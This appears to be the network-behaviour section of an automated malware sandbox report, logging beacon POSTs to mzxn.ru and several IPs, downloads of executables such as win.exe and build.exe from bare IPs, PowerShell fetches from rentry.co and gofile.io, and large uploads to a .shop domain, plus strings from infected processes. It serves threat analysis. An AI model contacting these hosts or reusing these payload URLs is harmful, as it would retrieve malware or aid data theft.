Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568846Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crbyycflvhqviag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkjvhpickvgumugy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlolxnvijkbxdkju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crtrnvacvaqsvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igyjobtodmctowt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sowhywcgsmotmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wathnngxbyoowmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcdtsqtavhskibhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gepaukacbiyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuinbvqevufc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewndxwxqsldh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pcatlfkkstdxqqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxcsmobdatpu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnawhflyfaljta.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://soaxpgcflilwcjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtecgpbonqhjbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kriqrmlnqypou.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrfvitgbvcw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnvcslusckae.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qinwutyayfcko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpsqjgbmrba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnhraoopptocahym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uffvfrhcnqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbsrmkgaclwdahn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkiilqyskldjgofe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brdcuglswdjuibu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqxhoujpotsnhua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igndfrdsspnvoxyl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snlibtbsitsby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://srmyuatrmfavkh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yepbkxlonjp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqsjxbmjbmnltw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oydnksqvapytmm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: mzxn.ru
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: mzxn.ru
Source: global traffic DNS traffic detected: DNS query: mussangroup.com
Source: global traffic DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic DNS traffic detected: DNS query: rentry.co
Source: global traffic DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: liernessfornicsa.shop
Source: unknown HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr String found in binary or memory: http://.css
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000010.00000003.2615420100.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707013800.0000000003118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000010.00000003.2575678212.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2572695402.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2575134203.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2660016076.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2662557476.0000000003218000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
